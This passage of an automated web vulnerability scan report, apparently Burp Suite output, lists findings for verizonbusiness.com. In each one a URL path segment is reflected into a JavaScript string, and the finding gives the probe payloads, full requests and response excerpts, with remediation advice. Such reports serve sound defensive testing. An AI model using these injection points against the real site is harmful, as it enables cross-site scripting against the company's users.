Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-appsacab6';674b2b76631/app-mgmt/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.132. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b2d"%3bcaecadb681b was submitted in the REST URL parameter 3. This input was echoed as e2b2d";caecadb681b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-appse2b2d"%3bcaecadb681b/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Date: Wed, 17 Nov 2010 00:40:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-appse2b2d";caecadb681b/app-mgmt/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.133. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b75cf"%3b9b20cbb98b5 was submitted in the REST URL parameter 4. This input was echoed as b75cf";9b20cbb98b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/app-mgmtb75cf"%3b9b20cbb98b5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:18 GMT
Content-Type: text/html
Content-Length: 43319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps/app-mgmtb75cf";9b20cbb98b5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.134. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bfb0'%3b8189e6f9970 was submitted in the REST URL parameter 4. This input was echoed as 4bfb0';8189e6f9970 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/app-mgmt4bfb0'%3b8189e6f9970/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps/app-mgmt4bfb0';8189e6f9970/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.135. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cc38"%3bebcdf587aaf was submitted in the REST URL parameter 1. This input was echoed as 3cc38";ebcdf587aaf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3cc38"%3bebcdf587aaf/it/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:29 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:40:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3cc38";ebcdf587aaf/it/managed-apps/enterprise/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.136. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f485'%3b29c124e2012 was submitted in the REST URL parameter 1. This input was echoed as 1f485';29c124e2012 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1f485'%3b29c124e2012/it/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products1f485';29c124e2012/it/managed-apps/enterprise/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.137. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1126'%3b6cc6916aa59 was submitted in the REST URL parameter 2. This input was echoed as e1126';6cc6916aa59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/ite1126'%3b6cc6916aa59/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/ite1126';6cc6916aa59/managed-apps/enterprise/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.138. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a69f2"%3b70c6828dd23 was submitted in the REST URL parameter 2. This input was echoed as a69f2";70c6828dd23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/ita69f2"%3b70c6828dd23/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/ita69f2";70c6828dd23/managed-apps/enterprise/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.139. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fde9"%3b8dc03f90ff4 was submitted in the REST URL parameter 3. This input was echoed as 8fde9";8dc03f90ff4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps8fde9"%3b8dc03f90ff4/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps8fde9";8dc03f90ff4/enterprise/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.140. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe74'%3bfe40590ec48 was submitted in the REST URL parameter 3. This input was echoed as 4fe74';fe40590ec48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps4fe74'%3bfe40590ec48/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps4fe74';fe40590ec48/enterprise/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.141. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab036"%3ba30048d6ff was submitted in the REST URL parameter 4. This input was echoed as ab036";a30048d6ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/enterpriseab036"%3ba30048d6ff/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:42:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
x.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps/enterpriseab036";a30048d6ff/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.142. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c5da'%3b8bd782249d9 was submitted in the REST URL parameter 4. This input was echoed as 4c5da';8bd782249d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/enterprise4c5da'%3b8bd782249d9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps/enterprise4c5da';8bd782249d9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.143. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fdb7"%3b524858dde52 was submitted in the REST URL parameter 1. This input was echoed as 7fdb7";524858dde52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7fdb7"%3b524858dde52/it/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products7fdb7";524858dde52/it/managed-it/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.144. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3c2'%3b36e386e35b0 was submitted in the REST URL parameter 1. This input was echoed as cd3c2';36e386e35b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

